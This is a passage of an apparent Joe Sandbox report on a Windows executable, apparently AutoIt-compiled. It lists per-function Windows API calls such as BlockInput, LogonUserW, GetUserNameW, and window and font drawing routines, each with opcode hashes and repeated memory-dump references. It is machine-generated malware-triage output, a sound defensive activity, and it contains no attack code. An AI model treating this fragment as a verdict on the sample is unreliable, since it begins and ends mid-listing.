                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Proc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2346855178-0
                                                                                                                  • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                  • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                                  • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                  • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                                  APIs
                                                                                                                  • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlockInput
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3456056419-0
                                                                                                                  • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                  • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                                  • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                  • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                                  APIs
                                                                                                                  • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LogonUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1244722697-0
                                                                                                                  • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                  • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                                  • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                  • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                                  APIs
                                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: NameUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2645101109-0
                                                                                                                  • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                  • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                                  • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                  • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                  • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                                  • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                  • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: N@
                                                                                                                  • API String ID: 0-1509896676
                                                                                                                  • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                  • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                  • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                  • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                  • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                  • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                  • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                  • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                  • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                  • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                                  • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                  • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                  • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                  • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                                  APIs
                                                                                                                  • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                                  • DeleteObject.GDI32(?), ref: 00459551
                                                                                                                  • DestroyWindow.USER32(?), ref: 00459563
                                                                                                                  • GetDesktopWindow.USER32 ref: 00459581
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                                  • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                                  • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                                  • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                                  • _wcslen.LIBCMT ref: 00459916
                                                                                                                  • _wcscpy.LIBCMT ref: 0045993A
                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                                  • GetDC.USER32(00000000), ref: 004599FC
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                                  • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                                  • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                  • API String ID: 4040870279-2373415609
                                                                                                                  • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                  • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                  • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                  • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                  APIs
                                                                                                                  • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                  • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                  • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                  • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                    • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                    • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                    • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                    • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                    • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                    • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                    • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                    • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 69173610-0
                                                                                                                  • Opcode ID: 475ada3790e3f9bc1c44d2a2c8bac138defb4c4271a9047ca2106c4d36eb810f
                                                                                                                  • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                  • Opcode Fuzzy Hash: 475ada3790e3f9bc1c44d2a2c8bac138defb4c4271a9047ca2106c4d36eb810f
                                                                                                                  • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                  • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
